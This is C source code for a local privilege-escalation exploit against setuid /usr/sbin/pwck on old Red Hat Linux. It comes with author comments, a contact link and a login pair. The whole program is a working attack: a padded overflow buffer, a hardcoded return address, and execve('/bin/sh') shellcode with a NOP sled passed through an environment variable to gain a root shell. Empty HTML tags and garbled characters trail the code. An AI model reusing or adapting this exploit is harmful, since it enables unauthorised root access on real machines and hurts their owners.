/* /usr/sbin/pwck local root exploit for linux */ /* Effects only +s on pwck */ /* Remember though its a good way to break free */ /* from restricted shells - even to the same UID*/ /* http://oakey.no-ip.com:82/uk2sec/ */ /* kiddie:password */ /* c0w_d0g3@yahoo.co.uk */ /* Tested on Redhat 7.1/2/3 */ #include #include #include int main() { char linuxshellcode[] = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" "\xeb\x16\x31\xdb\x31\xc9\xf7\xe1" "\x5b\xb0\x0b\x88\x53\x07\x52\x53" "\x89\xe1\xcd\x80\xb0\x01\xcd\x80" "\xe8\xe5\xff\xff\xff/bin/sh"; char buffer[3000]; long retaddr = 0xbfffffa1; int padding = 2400; char shell[512]; printf("\nuk2sec c0w_d0g3"); printf("\nThis is a local exploit for /usr/bin/pwck\n"); printf("Satic return address is at : %x\n\n", retaddr); /* Building the buffer */ bzero(&buffer, sizeof(buffer)); memset(buffer,'A',padding); //size of buffer *(unsigned long *)(buffer+strlen(buffer))=retaddr; //return address memset(shell,0x90,100); memcpy(&shell[100-strlen(linuxshellcode)],linuxshellcode,strlen(linuxshellcode)); memcpy(shell,"SHELLCODE=",10); putenv(shell); execl("/usr/sbin/pwck", "pwck", buffer, 0); /* uid pwck +s */ }
<span id="7ztzv"></span>
<sub id="7ztzv"></sub>


<span id="7ztzv"></span><form id="7ztzv"></form>


<span id="7ztzv"></span>
    

      

        <address id="7ztzv"></address>
            

ÑÇÖÞÅ·ÃÀÔÚÏß